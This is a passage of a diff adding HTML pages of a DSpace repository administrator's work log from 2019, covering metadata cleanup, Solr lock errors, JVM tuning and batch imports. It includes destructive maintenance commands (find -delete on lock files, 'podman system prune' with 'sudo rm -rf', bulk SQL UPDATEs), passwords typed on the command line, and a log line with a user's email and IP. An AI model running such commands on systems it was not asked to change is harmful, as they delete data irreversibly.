  • I added “Unpaywall” to the list of bots in the Tomcat Crawler Session Manager Valve (see the server.xml sketch at the end of this day’s notes)
  • +
  • Set up nginx to use TLS and proxy pass to NodeJS on the AReS development server (linode20)
  • +
  • Run all system updates on linode20 and reboot it
  • +
  • Also, there is 10 to 20% CPU steal on that VM, so I will ask Linode to move it to another host
  • +
  • Commit changes to the resolve-addresses.py script to add proper CSV output support
  • +
+
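  • For reference, the valve is configured in Tomcat’s server.xml and takes a regular expression of user agents, roughly like this (the exact pattern is an illustration):

<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Unpaywall.*|.*Blackboard Safeassign.*" />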

2019-05-14

+
    +
  • Skype with Peter and AgroKnow about the CTA storytelling modifications they want to do on the CTA ICT Update collection on CGSpace +
      +
    • I told them they should aim for modifying the collection theme and inserting some custom HTML / JS
    • +
    • I need to send Panagis some documentation about Mirage 2 and the DSpace build process, as well as the Maven settings for build
    • +
    +
  • +
+

2019-05-15

+
    +
  • Tezira says she’s having issues with email reports for approved submissions, but I received an email about collection subscriptions this morning, and I tested with dspace test-email and it’s also working…
  • +
  • Send a list of DSpace build tips to Panagis from AgroKnow
  • +
  • Finally fix the AReS v2 to work via DSpace Test and send it to Peter et al to give their feedback +
      +
    • We had issues with CORS due to Moayad using a hard-coded domain name rather than a relative URL
    • +
    +
  • +
+

2019-05-16

+
    +
  • Export a list of all investors (dc.description.sponsorship) for Peter to look through and correct:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
+COPY 995
+
+

2019-05-17

+
    +
  • Peter sent me a bunch of fixes for investors from yesterday
  • +
  • I did a quick check in OpenRefine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
+
    +
  • Then I started a full Discovery re-indexing:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically
  • +
  • Instead, I exported a new list and asked Peter to look at it again
  • +
  • Apply Peter’s new corrections on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
+
    +
  • Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (#423) +
      +
    • I will deploy the changes on CGSpace the next time we re-deploy
    • +
    +
  • +
+

2019-05-19

+
    +
  • Add “ISI journal” to item view sidebar at the request of Maria Garruccio
  • +
  • Update fix-metadata-values.py and delete-metadata-values.py scripts to add some basic checking of CSV fields and colorize shell output using Colorama
  • +
+

2019-05-24

+
    +
  • Update AReS README.md on GitHub repository to add a proper introduction, credits, requirements, installation instructions, and legal information
  • +
  • Update CIP subjects in input forms on CGSpace (#424)
  • +
+

2019-05-25

+
    +
  • Help Abenet proof ten Africa Rice publications +
      +
    • Convert some dates to string (from number in Excel)
    • +
    • Trim whitespace on all fields
    • +
    • Correct and standardize affiliations
    • +
    • Validate subject terms against AGROVOC
    • +
    • Add rights information to all items
    • +
    • Correct and standardize sponsors
    • +
    +
  • +
  • Generate Simple Archive Format bundle with SAFBuilder and import into the AfricaRice Articles in Journals collection on CGSpace:
  • +
+
$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
+

2019-05-27

+
    +
  • Peter sent me over two thousand corrections for the authors on CGSpace that I had dumped last month +
      +
    • I proofed them for whitespace and invalid special characters in OpenRefine and then applied them on CGSpace and DSpace Test:
    • +
    +
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
+
    +
  • Then start a full Discovery re-indexing on each server:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"                                   
+$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
    +
  • Export new list of all authors from CGSpace database to send to Peter:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
+COPY 64871
+
    +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
  • Paola from CIAT asked for a way to generate a report of the top keywords for each year of their articles and journals +
      +
    • I told them that the best way (even though it’s low tech) is to work on a CSV dump of the collection
    • +
    +
  • +
+

2019-05-29

+
    +
  • A CIMMYT user was having problems registering or logging into CGSpace +
      +
    • I tried to register her and it gave an error, then I remembered that for CGIAR LDAP users we actually just need to log in and it will automatically create an eperson
    • +
    • I told her to try to log in with the LDAP login method and let me know what happens (then I can look in the logs too)
    • +
    +
  • +
+

2019-05-30

+
    +
  • I see the following error in the DSpace log when the user tries to log in with her CGIAR email and password on the LDAP login:
  • +
+
2019-05-30 07:19:35,166 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=A5E0C836AF8F3ABB769FE47107AE1CFF:ip_addr=185.71.4.34:failed_login:no DN found for user sa.saini@cgiar.org
+
    +
  • For now I just created an eperson with her personal email address until I have time to check LDAP to see what’s up with her CGIAR account:
  • +
+
$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
+
+ + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2019-06/index.html b/docs/2019-06/index.html new file mode 100644 index 000000000..0cb3dd632 --- /dev/null +++ b/docs/2019-06/index.html @@ -0,0 +1,371 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + June, 2019 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

June, 2019

+ +
+

2019-06-02

+ +

2019-06-03

+
    +
  • Skype with Marie-Angélique and Abenet about CG Core v2
  • +
+
    +
  • Here is a list of proposed metadata migrations for CGSpace +
      +
    • dc.language.iso→DCTERMS.language (and switch to ISO 639-2 Alpha 3)
    • +
    • dc.description.abstract→DCTERMS.abstract
    • +
    • dc.identifier.citation→DCTERMS.bibliographicCitation
    • +
    • dc.contributor.author→DCTERMS.creator (for people)
    • +
    • dc.description.sponsorship→cg.contributor.donor (values from CrossRef or Grid.ac if possible)
    • +
    • dc.rights→DCTERMS.license
    • +
    • cg.identifier.status→DCTERMS.accessRights (values “open” or “restricted”)
    • +
    • cg.creator.id→cg.creator.identifier?
    • +
    • dc.relation.ispartofseries→DCTERMS.isPartOf
    • +
    • cg.link.relation→DCTERMS.relation
    • +
    +
  • +
  • Marie agreed that we need to adopt some controlled lists for our values, and pointed out that the MARLO team maintains a list of CRPs and Centers at CLARISA +
      +
    • There is an API there but it needs a password for access…
    • +
    +
  • +
+

2019-06-04

+
    +
  • The MARLO team responded and said they will give us access to the CLARISA API
  • +
  • Marie-Angélique proposed to integrate dcterms.isPartOf, dcterms.abstract, and dcterms.bibliographicCitation into the CG Core v2 schema +
      +
    • I told her I would attempt to integrate those and the others above into DSpace Test soon and report back
    • +
    • We also need to discuss with the ILRI Data Portal, MEL/MELSpace, and users who consume the CGSpace API
    • +
    +
  • +
  • Add Arabic language to input-forms.xml (#427), as Bioversity is adding some Arabic items and noticed it missing
  • +
+

2019-06-05

+
    +
  • Send mail to CGSpace and MELSpace people to let them know about the proposed metadata field migrations after the discussion with Marie-Angélique
  • +
+

2019-06-07

+
    +
  • Thierry noticed that the CUA statistics were missing previous years again, and I see that the Solr admin UI has the following message:
  • +
+
statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+
    +
  • I had to restart Tomcat a few times for all the stats cores to get loaded with no issue
  • +
+

2019-06-10

+
    +
  • Rename the AReS repository on GitHub to OpenRXV: https://github.com/ilri/OpenRXV
  • +
  • Create a new AReS repository: https://github.com/ilri/AReS
  • +
  • Start looking at the 203 IITA records on DSpace Test from last month (IITA_May_16 aka “20194th.xls”) using OpenRefine +
      +
    • Trim leading, trailing, and consecutive whitespace on all columns, but I didn’t notice very many issues
    • +
    • Validate affiliations against latest list of top 1500 terms using reconcile-csv, correcting and standardizing about twenty-seven
    • +
    • Validate countries against latest list of countries using reconcile-csv, correcting three
    • +
    • Convert all DOIs to “https://dx.doi.org” format
    • +
    • Normalize all cg.identifier.url Google book fields to “books.google.com”
    • +
    • Correct some inconsistencies in IITA subjects
    • +
    • Correct two incorrect “Peer Review” in dc.description.version
    • +
    • About fifteen items have incorrect ISBNs (looks like an Excel error because the values appear in scientific notation)
    • +
    • Delete one blank item
    • +
    • I managed to get to subjects, so I’ll continue from there when I start working next
    • +
    +
  • +
  • Generate a new list of countries from the database for use with reconcile-csv +
      +
    • After dumping, use csvcut to add line numbers, then change the csv header to match those you use in reconcile-csv, for example id and name:
    • +
    +
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV HEADER
+COPY 192
+$ csvcut -l -c 0 /tmp/countries.csv > 2019-06-10-countries.csv
+
    +
  • Get a list of all the unique AGROVOC subject terms in IITA’s data and export it to a text file so I can validate them with my agrovoc-lookup.py script:
  • +
+
$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u > iita-agrovoc.txt
+$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
+$ wc -l iita-agrovoc*
+  402 iita-agrovoc-matches.txt
+   29 iita-agrovoc-rejects.txt
+  431 iita-agrovoc.txt
+
    +
  • Combine these IITA matches with the subjects I matched a few months ago:
  • +
+
$ csvcut -c name 2019-03-18-subjects-matched.csv | grep -v name | cat - iita-agrovoc-matches.txt | sort -u > 2019-06-10-subjects-matched.txt
+
    +
  • Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to id:
  • +
+
$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' > 2019-06-10-subjects-matched.csv
+

2019-06-20

+
    +
  • Share some feedback about AReS v2 with the colleagues and encourage them to do the same
  • +
+

2019-06-23

+ +
$ podman pull docker.io/library/postgres:9.6-alpine
+$ podman rm dspacedb
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+

2019-06-25

+
    +
  • Normalize text_lang values for metadata on DSpace Test and CGSpace:
  • +
+
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
+UPDATE 1551
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE 2070
+dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
+UPDATE 2
+
    +
  • Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace
  • +
  • Communicate with Bioversity contractor in charge of their migration from Typo3 to CGSpace
  • +
+

2019-06-28

+
    +
  • Start looking at the fifty-seven AfricaRice records sent by Ibnou earlier this month +
      +
    • First, I see there are several items with type “Book” and “Book Chapter” that should go in an “AfricaRice books and book chapters” collection, but none exists in the AfricaRice community
    • +
    • Trim and collapse consecutive whitespace on author, affiliation, authorship types, title, subjects, doi, issn, source, citation, country, sponsors
    • +
    • Standardize and correct affiliations like “Africa Rice Cente” and “Africa Rice Centre”, including syntax errors with multi-value separators
    • +
    • Lots of variation in affiliations, for example: +
        +
      • Université Abomey-Calavi
      • +
      • Université d’Abomey
      • +
      • Université d’Abomey Calavi
      • +
      • Université d’Abomey-Calavi
      • +
      • University of Abomey-Calavi
      • +
      +
    • +
    • Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine: +
        +
      • $ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id
      • +
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
      • +
      +
    • +
    • Replace smart quotes with standard ASCII ones
    • +
    • Fix typos in authorship types
    • +
    • Validate and normalize subjects against our 2019-06 list using reconcile-csv and OpenRefine: +
        +
      • $ lein run ~/src/git/DSpace/2019-06-10-subjects-matched.csv name id
      • +
      • Also add about 30 new AGROVOC subjects to our list that I verified manually
      • +
      +
    • +
    • There is one duplicate, both have the same DOI: https://doi.org/10.1016/j.agwat.2018.06.018
    • +
    • Fix four ISBNs that were in the ISSN field
    • +
    +
  • +
+

2019-06-30

+
    +
  • Upload fifty-seven AfricaRice records to DSpace Test +
      +
    • I created the SAF bundle with SAFBuilder and then imported it via the CLI:
    • +
    +
  • +
+
$ dspace import -a -e me@cgiar.org -m 2019-06-30-AfricaRice-11to73.map -s /tmp/2019-06-30-AfricaRice-11to73
+
    +
  • I sent feedback about a few missing PDFs and one duplicate to Ibnou to check
  • +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2019-07/index.html b/docs/2019-07/index.html new file mode 100644 index 000000000..78fafa378 --- /dev/null +++ b/docs/2019-07/index.html @@ -0,0 +1,608 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + July, 2019 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

July, 2019

+ +
+

2019-07-01

+
    +
  • Create an “AfricaRice books and book chapters” collection on CGSpace for AfricaRice
  • +
  • Last month Sisay asked why the following “most popular” statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: + +
  • +
  • Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
  • +
+
    +
  • If I change the parameters to 2019 I see stats, so I’m really thinking it has something to do with the sharded yearly Solr statistics cores +
      +
    • I checked the Solr admin UI and I see all Solr cores loaded, so I don’t know what it could be
    • +
    • When I check the Atmire content and usage module it seems obvious that there is a problem with the old cores because I don’t have anything before 2019-01
    • +
    +
  • +
+

Atmire CUA 2018 stats missing

+
    +
  • I don’t see anyone logged in right now so I’m going to try to restart Tomcat and see if the stats are accessible after Solr comes back up
  • +
  • I decided to run all system updates on the server (linode18) and reboot it +
      +
    • After rebooting, Tomcat came back up, but the Solr statistics cores were not all loaded
    • +
    • The error is always (with a different core):
    • +
    +
  • +
+
org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
+
    +
  • I restarted Tomcat ten times and it never worked…
  • +
  • I tried to stop Tomcat and delete the write locks:
  • +
+
# systemctl stop tomcat7
+# find /dspace/solr/statistics* -iname "*.lock" -print -delete
+/dspace/solr/statistics/data/index/write.lock
+/dspace/solr/statistics-2010/data/index/write.lock
+/dspace/solr/statistics-2011/data/index/write.lock
+/dspace/solr/statistics-2012/data/index/write.lock
+/dspace/solr/statistics-2013/data/index/write.lock
+/dspace/solr/statistics-2014/data/index/write.lock
+/dspace/solr/statistics-2015/data/index/write.lock
+/dspace/solr/statistics-2016/data/index/write.lock
+/dspace/solr/statistics-2017/data/index/write.lock
+/dspace/solr/statistics-2018/data/index/write.lock
+# find /dspace/solr/statistics* -iname "*.lock" -print -delete
+# systemctl start tomcat7
+
    +
  • But it still didn’t work!
  • +
  • I stopped Tomcat, deleted the old locks, and will try to use the “simple” lock file type in solr/statistics/conf/solrconfig.xml:
  • +
+
<lockType>${solr.lock.type:simple}</lockType>
+
    +
  • And after restarting Tomcat it still doesn’t work
  • +
  • Now I’ll try going back to “native” locking with unlockAtStartup:
  • +
+
<unlockOnStartup>true</unlockOnStartup>
+
    +
  • Now the cores seem to load, but I still see an error in the Solr Admin UI and I still can’t access any stats before 2018
  • +
  • I filed an issue with Atmire, so let’s see if they can help
  • +
  • And since I’m annoyed and it’s been a few months, I’m going to move the JVM heap settings that I’ve been testing on DSpace Test to CGSpace
  • +
  • The old ones were:
  • +
+
-Djava.awt.headless=true -Xms8192m -Xmx8192m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
+
    +
  • And the new ones come from Solr 4.10.x’s startup scripts:
  • +
+
    -Djava.awt.headless=true
+    -Xms8192m -Xmx8192m
+    -Dfile.encoding=UTF-8
+    -XX:NewRatio=3
+    -XX:SurvivorRatio=4
+    -XX:TargetSurvivorRatio=90
+    -XX:MaxTenuringThreshold=8
+    -XX:+UseConcMarkSweepGC
+    -XX:+UseParNewGC
+    -XX:ConcGCThreads=4 -XX:ParallelGCThreads=4
+    -XX:+CMSScavengeBeforeRemark
+    -XX:PretenureSizeThreshold=64m
+    -XX:+UseCMSInitiatingOccupancyOnly
+    -XX:CMSInitiatingOccupancyFraction=50
+    -XX:CMSMaxAbortablePrecleanTime=6000
+    -XX:+CMSParallelRemarkEnabled
+    -XX:+ParallelRefProcEnabled
+    -Dcom.sun.management.jmxremote
+    -Dcom.sun.management.jmxremote.port=1337
+    -Dcom.sun.management.jmxremote.ssl=false
+    -Dcom.sun.management.jmxremote.authenticate=false
+

2019-07-02

+
    +
  • Help upload twenty-seven posters from the 2019-05 Sharefair to CGSpace +
      +
    • Sisay had already created the SAF bundle, so I made some minor corrections and uploaded them to a temporary collection so I could check them in OpenRefine:
    • +
    +
  • +
+
$ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
+$ echo "10568/101992" >> item_*/collections
+$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
+
    +
  • I noticed that all twenty-seven items had double dates like “2019-05||2019-05” so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection
  • +
  • Finish looking at the fifty-six AfricaRice items and upload them to CGSpace:
  • +
+
$ dspace import -a -e me@cgiar.org -m 2019-07-02-AfricaRice-11to73.map -s /tmp/SimpleArchiveFormat
+
    +
  • Peter pointed out that the Sharefair dates I fixed were not actually fixed +
      +
    • It seems there is a bug that causes DSpace to not detect changes if the values are the same like “2019-05||2019-05” and you try to remove one
    • +
    • To get it to work I had to change some of them to 2019-01, then remove them
    • +
    +
  • +
+

2019-07-03

+
    +
  • Atmire responded about the Solr issue and said they would be willing to help
  • +
+

2019-07-04

+
    +
  • Maria Garruccio sent me some new ORCID identifiers for Bioversity authors +
      +
    • I combined them with our existing list and then used my resolve-orcids.py script to update the names from ORCID.org:
    • +
    +
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-07-04-orcid-ids.txt
+$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
+
    +
  • Send and merge a pull request for the new ORCID identifiers (#428)
  • +
  • I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the database:
  • +
+
cg.creator.id,correct
+"Marius Ekué: 0000-0002-5829-6321","Marius R.M. Ekué: 0000-0002-5829-6321"
+"Mwungu: 0000-0001-6181-8445","Chris Miyinzi Mwungu: 0000-0001-6181-8445"
+"Mwungu: 0000-0003-1658-287X","Chris Miyinzi Mwungu: 0000-0003-1658-287X"
+
    +
  • But when I ran fix-metadata-values.py I didn’t see any changes:
  • +
+
$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
+

2019-07-06

+ +

2019-07-08

+
    +
  • Communicate with Atmire about the Solr statistics cores issue +
      +
    • I suspect we might need to get more disk space on DSpace Test so we can try to replicate the production environment more closely
    • +
    +
  • +
  • Meeting with AgroKnow and CTA about their new ICT Update story telling thing +
      +
    • AgroKnow has developed a React application to display tag clouds based on harvesting metadata and full text from CGSpace items
    • +
    • We discussed how to host it technically; perhaps we could purchase a server to run it on and just give the AgroKnow guys access
    • +
    +
  • +
  • Playing with the idea of using xsv to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:
  • +
+
$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
+field,value,count
+cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
+$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'         
+field,value,count
+dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
+
    +
  • Or perhaps if DOIs are valid or not (having doi.org in the URL):
  • +
+
$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
+field,value,count
+cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
+
+
$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '"' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
+dc.identifier.issn
+978-3-319-71997-9
+978-3-319-71997-9
+978-3-319-71997-9
+978-3-319-58789-9
+2320-7035 
+ 2593-9173
+

2019-07-09

+ +

2019-07-11

+
    +
  • Skype call with Marie Angelique about CG Core v2 +
      +
    • We discussed my comments and suggestions from last week
    • +
    • One comment she had was that we should try to move our center-specific subjects into DCTERMS.subject and normalize them against AGROVOC
    • +
    • I updated my gist about CGSpace metadata changes
    • +
    +
  • +
  • Skype call with Jane Poole to discuss OpenRXV/AReS Phase II TORs +
      +
    • I need to follow up with Moayad about the reporting functionality
    • +
    • Also, I need to email Harrison my notes on the CG Core v2 stuff
    • +
    • Also, Jane asked me to check the Data Portal to see which email address requests for confidential data are going to
    • +
    +
  • +
  • Yesterday Thierry from CTA asked me about an error he was getting while submitting an item on CGSpace: “Unable to load Submission Information, since WorkspaceID (ID:S106658) is not a valid in-process submission.”
  • +
  • I looked in the DSpace logs and found this right around the time of the screenshot he sent me:
  • +
+
2019-07-10 11:50:27,433 INFO  org.dspace.submit.step.CompleteStep @ lewyllie@cta.int:session_id=A920730003BCAECE8A3B31DCDE11A97E:submission_complete:Completed submission with id=106658
+
    +
  • I’m assuming something happened in his browser (like a refresh) after the item was submitted…
  • +
+

2019-07-12

+
    +
  • Atmire responded with some initial feedback about our Tomcat configuration related to the Solr issue I raised recently +
      +
    • Unfortunately there is no concrete feedback yet
    • +
    • I think we need to upgrade our DSpace Test server so we can fit all the Solr cores…
    • +
    • Actually, I looked and there were over 40 GB free on DSpace Test so I copied the Solr statistics cores for the years 2017 to 2010 from CGSpace to DSpace Test because they weren’t actually very large
    • +
    • I re-deployed DSpace for good measure, and I think all Solr cores are loading… I will do more tests later
    • +
    +
  • +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
  • Tried to run dspace cleanup -v on CGSpace and ran into an error:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(167394) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
# su - postgres
+$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
+UPDATE 1
+

2019-07-16

+
    +
  • Completely reset the Podman configuration on my laptop because there were some layers that I couldn’t delete and it had been some time since I did a cleanup:
  • +
+
$ podman system prune -a -f --volumes
+$ sudo rm -rf ~/.local/share/containers
+
    +
  • Then pull a new PostgreSQL 9.6 image and load a CGSpace database dump into a new local test container:
  • +
+
$ podman pull postgres:9.6-alpine
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'                     
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+
    +
  • Start working on implementing the CG Core v2 changes on my local DSpace test environment
  • +
  • Make a pull request to CG Core v2 with some fixes for typos in the specification (#5)
  • +
+

2019-07-18

+
    +
  • Talk to Moayad about the remaining issues for OpenRXV / AReS +
      +
    • He sent a pull request with some changes for the bar chart and documentation about configuration, and said he’d finish the export feature next week
    • +
    +
  • +
  • Sisay said a user was having problems registering on CGSpace and it looks like the email account expired again:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: blahh@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+
    +
  • I emailed ICT to ask them to reset it and make the expiration period longer if possible
  • +
+

2019-07-19

+
    +
  • ICT reset the password for the CGSpace support account and apparently removed the expiry requirement +
      +
    • I tested the account and it’s working
    • +
    +
  • +
+

2019-07-20

+
    +
  • Create an account for Lionelle Samnick on CGSpace because the registration isn’t working for some reason:
  • +
+
$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
+
    +
  • I added her as a submitter to CTA ISF Pro-Agro series
  • +
  • Start looking at 1429 records for the Bioversity batch import +
      +
    • Multiple authors should be specified with the multi-value separator (||) instead of “;” (see the sketch after this list)
    • +
    • We don’t use “(eds)” as an author
    • +
    • Same issue with dc.publisher using “;” for multiple values
    • +
    • Some invalid ISSNs in dc.identifier.issn (they look like ISBNs)
    • +
    • I see some ISSNs in the dc.identifier.isbn field
    • +
    • I see some invalid ISBNs that look like Excel errors (9,78E+12)
    • +
    • For DOI we just use the URL, not “DOI: https://doi.org…”
    • +
    • I see an invalid “LEAVE BLANK” in the cg.contributor.crp field
    • +
    • Country field is using “,” for multiple values instead of “||”
    • +
    • Region field is using “,” for multiple values instead of “||”
    • +
    • Language field should be lowercase like “en”, and it is using the wrong multiple value separator, and has some invalid values
    • +
    • What is the cg.identifier.url2 field? You should probably add those as cg.link.reference
    • +
    +
  • +
+
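
Since several of these fixes are mechanical, here is a minimal sketch of how the separator and language fixes above could be scripted in Python with Pandas; this is not part of the actual workflow, and the file name and column list are assumptions:

#!/usr/bin/env python3
# Hedged sketch: convert ";"-separated multi-value fields to DSpace's "||"
# separator and lowercase the language codes (file/column names are assumptions)
import pandas as pd

df = pd.read_csv("/tmp/bioversity.csv", dtype=str)

def fix_separators(value):
    # split on ";" and re-join with "||", trimming whitespace around each value
    if not isinstance(value, str):
        return value
    return "||".join(part.strip() for part in value.split(";"))

for column in ["dc.contributor.author", "dc.publisher", "cg.coverage.country", "cg.coverage.region"]:
    df[column] = df[column].apply(fix_separators)

# language codes should be lowercase, for example "EN" -> "en"
df["dc.language.iso"] = df["dc.language.iso"].str.lower()

df.to_csv("/tmp/bioversity-fixed.csv", index=False)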

2019-07-22

+ +
    <dct:coverage>
+        <dct:spatial>
+            <type>Country</type>
+            <dct:identifier>http://sws.geonames.org/192950</dct:identifier>
+            <rdfs:label>Kenya</rdfs:label>
+        </dct:spatial>
+    </dct:coverage>
+
    +
  • I left a note saying that DSpace is technically limited to a flat schema so we use cg.coverage.country: Kenya
  • +
  • Do a little more work on CG Core v2 in the input forms
  • +
+

2019-07-25

+
    +
  • +

    Generate a list of the ORCID identifiers that we added to CGSpace in 2019 for Sara Jani at ICARDA

    +
  • +
  • +

    Bioversity sent a new file for their migration to CGSpace

    +
      +
    • There is always a blank row and blank column at the end
    • +
    • One invalid type (Brie)
    • +
    • 824 items with leading/trailing spaces in dc.identifier.citation
    • +
    • 175 items with a trailing comma in dc.identifier.citation (using custom text facet with GREL value.endsWith(',').toString())
    • +
    • Fix them with GREL transform: value.replace(/,$/, '')
    • +
    • A few strange publishers after splitting multi-value cells, like “(Belgium)”
    • +
    • Deleted four ISSNs that are actually ISBNs and are already present in the ISBN field
    • +
    • Eight invalid ISBNs
    • +
    • Convert all DOIs to “https://doi.org” format and fix one invalid DOI
    • +
